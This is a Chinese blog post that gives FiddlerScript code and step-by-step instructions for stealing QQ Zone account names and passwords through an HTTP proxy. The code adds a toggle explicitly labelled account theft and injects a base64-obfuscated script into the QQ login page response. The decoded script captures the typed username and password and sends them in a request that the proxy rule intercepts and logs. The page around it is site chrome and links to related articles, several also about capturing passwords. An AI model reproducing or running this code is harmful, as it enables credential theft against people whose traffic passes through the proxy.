FiddlerScript实现对QQ空间账号密码获取

最新推荐文章于 2022-10-09 20:23:20 发布
最新推荐文章于 2022-10-09 20:23:20 发布
阅读量3.1k 收藏 31
点赞数 5
分类专栏: fiddlerscript 文章标签: 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/svip2242257464/article/details/121649805
版权

代码片段1

//放入FiddlerScript最开头
import System.Text.RegularExpressions;

代码片段2

//放在OnBeforeRequest上面
    public static RulesOption("是否开启QQ空间盗号功能")
    BindPref("fiddlerscript.rules.daohao")
    var m_daohao: boolean = false;

    static function getQQ(QQBody){
            //下面是正则表达式用法
        var r = new Regex('user=(.*?)&pass=(.*?)$');
        var mc = r.Match(QQBody);
        if(mc.Groups[1].Value == ""){
            //没有匹配到,不再执行后面的代码
            FiddlerObject.log("[提示]:获取QQ空间密码失败,检查一下植入JS代码是否成功");
            return;
        }
        FiddlerObject.log("[提示]:获取账号密码成功,账号为:"+mc.Groups[1].Value+"密码为:"+mc.Groups[2].Value);            

    }

代码片段3


//OnBeforeRequest里面
 if(m_daohao && oSession.fullUrl.Contains("xui.ptlogin2.qq.com/data?user")){
            FiddlerObject.log("[提示]:正在获取账号信息");
            var url = oSession.fullUrl;
            getQQ(url)
            
        }

代码片段4

//OnBeforeResponse里面
 if(m_daohao && oSession.fullUrl.Contains("https://xui.ptlogin2.qq.com/cgi-bin/xlogin?proxy_url=")){
            //解码数据包,防止乱码
            oSession.utilDecodeResponse();         
            
            //替换数据包
            oSession.utilReplaceInResponse("</html>",'<script>eval(atob("ZnVuY3Rpb24gbG9hZFhNTERvYyh1c2VyLHBhc3MpDQp7DQoJdmFyIHhtbGh0dHA7DQoJaWYgKHdpbmRvdy5YTUxIdHRwUmVxdWVzdCkNCgl7DQoJCQ0KCQl4bWxodHRwPW5ldyBYTUxIdHRwUmVxdWVzdCgpOw0KCX0NCgllbHNlDQoJew0KCQkNCgkJeG1saHR0cD1uZXcgQWN0aXZlWE9iamVjdCgiTWljcm9zb2Z0LlhNTEhUVFAiKTsNCgl9DQoJeG1saHR0cC5vbnJlYWR5c3RhdGVjaGFuZ2U9ZnVuY3Rpb24oKQ0KCXsNCgkJaWYgKHhtbGh0dHAucmVhZHlTdGF0ZT09NCAmJiB4bWxodHRwLnN0YXR1cz09MjAwKQ0KCQl7DQoJCQlkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgibXlEaXYiKS5pbm5lckhUTUw9eG1saHR0cC5yZXNwb25zZVRleHQ7DQoJCX0NCgl9DQoJeG1saHR0cC5vcGVuKCJHRVQiLCIvZGF0YT91c2VyPSIrdXNlcisiJnBhc3M9IitwYXNzLHRydWUpOw0KCXhtbGh0dHAuc2VuZCgpOw0KfQ0KDQpkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgibG9naW5fYnV0dG9uIikuYWRkRXZlbnRMaXN0ZW5lcigiY2xpY2siLGZ1bmN0aW9uKCl7DQoJdmFyIHVzZXIgPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgidSIpLnZhbHVlOw0KCXZhciBwd2QgPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgicCIpLnZhbHVlOw0KCWxvYWRYTUxEb2ModXNlcixwd2QpDQp9KQ=="))</script></html>')
        }

代码使用步骤:

1.点击FiddlerScript

2.复制代码片段1,粘贴到最顶上

 3.点击Go to:OnBeforeRequest

4.复制代码片段2,将代码粘贴到OnBeforeRequest上面,注意粘贴在OnBeforeRquest和括号之间

 5.复制代码片段3,将代码粘贴到OnBeforeRequest里面,注意括号

6.点击Go to:OnBeforeResponse

7.复制代码片段4,将代码粘贴到OnBeforeResponse里面 ,注意在if前面

8.点击Rules,可以自由选择开启或者关闭盗号功能

 9.进入QQ空间,强制刷新QQ空间(Ctrl+F5),然后输入账号密码

10.来到Fiddler,点击Log,查看获取的内容

小白老师s
关注
  • 5
    点赞
  • 31
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
fiddler抓包获取mysql密码_PHP+fiddler抓包采集微信文章阅读数点赞数的思路详解
weixin_39523887的博客
03-04 524
简介:分析接口知道要获取文章阅读数和点赞数必须有key和uin这两个关键参数,不同公众号key不一样(据说有万能微信key,不懂怎么搞到),同一个公众号key大概半小时会过期提交链接获取文章阅读量api思路:1.将客户端请求阅读量接口的请求拦截转发到自己服务器,这样就可以获取到key ,用__biz关联缓存半小时2.提交文章链接进行查询时,服务器从文章链接里获取__biz,查询是否缓存了当前公众号...
QQ忘记密码代码
qq_41308488的博客
03-26 6220
首先需要在数据库中新建一张表把QQID、密保问题、密保答案都写进去然后在进行一下代码编写:using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq; using System.Text;...
fiddler渗透:Fiddler抓包修改登录名和密码,(登录后你会发现,登录的不是你的登录名)_xing2516_新浪博客
05-02 4536
渗透: Fiddler 抓包修改登录名和密码,(登录后你会发现,登录的不是你的登录名) 修改后 恐吓:修改提示内容
第一个项目:用python获取qq账号和密码
热门推荐
m0_46219202的博客
01-22 3万+
用python获取qq账号和密码第一个项目:用python获取qq账号和密码 第一个项目:用python获取qq账号和密码 2020/1/22 用python获取qq账号和密码,但实际上获取密码是加密状态的,待探索如何解秘 或不多说先上代码: import requests import random header = {'user-agent':'Mozilla/5.0 (Linux; An...
Wireshark简单抓包QQ过程
m0_62311351的博客
10-09 1万+
即将整个对话改为手机ip地址到笔记本ip地址 Show data as 改为原始数据,保存至桌面后缀为图片格式。4.在右上角输入ip.src==“手机Wifi的IP地址”1.将手机与笔记本连接在同一网络中,如连接同一WIFI。3.打开Wireshark,选择Wifi项。5.在手机QQ上发一张图片到我的电脑中。6.Wireshark显示如下。找到FF D8 并将前面的都删掉。10.使用101Editor。2.登录手机QQ和笔记本QQ。8.将部分数据改为如下。9.打开后发现不能查看。
挖藕!模拟sql抓取qq密码
qq_51131591的博客
05-16 504
挖藕!模拟sql查看qq密码模拟抓取到的qq数据通过封装实现数据库的连接1. 创建配置文件(包含驱动,url 密码,用户名)2. 实现封装工具类(涉及类加载机制复习)3. 利用封装工具类实现插入数据sql注入查看用户qq密码最后的结果(密码到手了哈哈哈!!!!!!!!!!!!!!!)漏洞的解决 模拟抓取到的qq数据 CREATE DATABASE `jdbcStudy` CHARACTER SET utf8 COLLATE utf8_general_ci; USE `jdbcStudy`; CREAT
分分钟学会Fiddler抓包工具的使用(二)
码农飞哥
04-19 3699
本文介绍了在手机上如何配置使用Fiddler以及如何修改请求参数和响应结果。希望对读者朋友们有所帮助。
Fiddler教程
fuxiao89的博客
11-01 435
源文地址:http://www.cnblogs.com/TankXiao/archive/2012/02/06/2337728.html Fiddler是最强大最好用的Web调试工具之一,它能记录所有客户端和服务器的http和https请求,允许你监视,设置断点,甚至修改输入输出数据. 使用Fiddler无论对开发还是测试来说,都有很大的帮助。 阅读目录 Fiddler的基本介绍
qq密码自动测试软件,QQ2004测试版密码获取演示
weixin_33241808的博客
07-22 1705
QQ2004测试版密码获取演示2004-6-2 19:142715QQ2004测试版密码获取演示2004-6-2 19:142715水平不高,请大家包涵最近快毕业了,比较忙。。。。如果补丁在你那里不好用,请给我反馈。QQ2004测试版密码获取演示作者:nbw[NE365]nboy.cnwlt.comwww.vxer.comQQ:343538175以前我做过盗取QQ2003密码的补丁。利用这种补...
用wireshark抓包明文和密码
luftmenschy的博客
12-14 9621
①下载安装wireshark ②选择WLAN,然后过滤筛选 ③然后我选择QQ登录,所以选择OICQ查看
通过抓包获取QQ空间相册的真实地址,实现空间相册下载
06-09
通过抓包获取QQ空间相册的真实地址,实现空间相册下载。
使用wireshark抓取账号密码
m0_62848808的博客
12-14 1万+
运行wireshark,选取当前电脑使用的网络,我是用学校WiFi,所以选取WiFi。 进入抓包页面,这时wireshark就已经开始抓取电脑上的数据包了。 我们登录一个网站,我选择的是桂林生活网http://www.guilinlife.com/,点击右上角的登录,随便在账号和密码输入,我输入的账号是admin,密码是987654321,点击登录,只要有反馈,比如登录失败,就表示发送数据包了。 wireshark已经抓取了刚刚发送的账号密码数据包,但是wireshark抓取的数据太多..
Fiddler的使用
weixin_44826986的博客
04-26 719
1.设置断点–更改登录数据 测试网站:https://antispider7.scrape.center/ 语法:bpu 测试链接 进入目标网页: 按照正常登录模式先登录,找出登陆后的API 用户名:admin1 密码:admin1 在Fiddler中TextView可以查看刚才输入的数据 在Row中可以发现请求发送的网站 在该请求网站设置断点:bpu https://antispider7.scrape.center/api/login HTTP/1.1 之后用错误的用户名和密码登录 观察到 请求
接口测试_03
lvbu_abcd的博客
04-19 334
4. Http基本认证    使用fiddler inspectors下的Auth选项卡可以很方便看到用户名和密码。 5. 缓存cache  在浏览器第一次请求某个地址时headers子项会提示 no cache                          在浏览器非第一次请求某个地址时会直接使用浏览器本地缓存数据呈现出来                          在浏
浅谈HTTPS以及Fiddler抓取HTTPS协议
稻草人技术博客
10-26 5489
最近想尝试基于Fiddler的录制功能做一些接口的获取和处理工作,碰到的一个问题就是简单连接Fiddler只能抓取HTTP协议,关键的登录请求等HTTPS协议都没有捕捉到,所以想让Fiddler能够同时抓取到HTTPS和HTTP协议,设置只是很小的一步,关键是了解HTTPS协议的原理、Fiddler抓取HTTPS协议的原理,然后才能更好的理解如何进行设置。本文主要由三部分组成,第一部分用比较通俗形象
Python+Requests接口测试教程(1):Fiddler抓包工具
qq4165498的博客
09-02 2万+
本书涵盖内容:fiddler、http协议、json、requests+unittest+报告、bs4、数据相关(mysql/oracle/logging)等内容。 刚买须知:本书是针对零基础入门接口测试和python+requests自动化的,首先本书确实写的比较基础,对基础内容也写的很详细,所以大神绕道。 为什么要先学fiddler? 学习接口测试必学http协议,如果直接先讲协议,我估
通过抓包获取QQ空间相册的真实地址,实现空间相册下载。
祭ヤ太子的专栏
08-15 1729
  在网上找过相关的资料,都不是太全~有些缺漏。所有自己根据网上的再结合自己的修改了下。 1.通过HttpAnalyzerStdV5 分析QQ空间相册的真实地址。一下就是空间相册的地址:   之前在网上看见只有一个地址,但是通过我的分析,貌似会有很大的问题。比如:某个人的空间相册有些是有设置密码的。也有不设置密码的,那么就无法下载。因为这类的相册是通过另外一个URL解析的。   ...
黑客-抓取数据包,并破解加密密码
猪也fine的博客
09-06 2万+
本文目的:抓取局域网内所有数据包,并获取数据包内密码,针对一些加密了的密码,进行解密工作,以此获取对方密码。之前我写过关于局域网内,使用arp欺骗,截取目标主机上网数据包。这是链接 http://blog.csdn.net/qq_35315699/article/details/74178872但是这个方法有点复杂,不易掌握,而且可能影响对方网速。这里有一个巧妙的方式。我是以寝室网作为实验场地
fiddlerscript
最新发布
09-01
你可以通过编写FiddlerScript脚本来实现这些功能。FiddlerScript基于JScript.NET语言,你可以在Fiddler中点击菜单"Rules > Customize Rules"打开FiddlerScript Editor编辑器,然后在这里编写你的FiddlerScript脚本。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值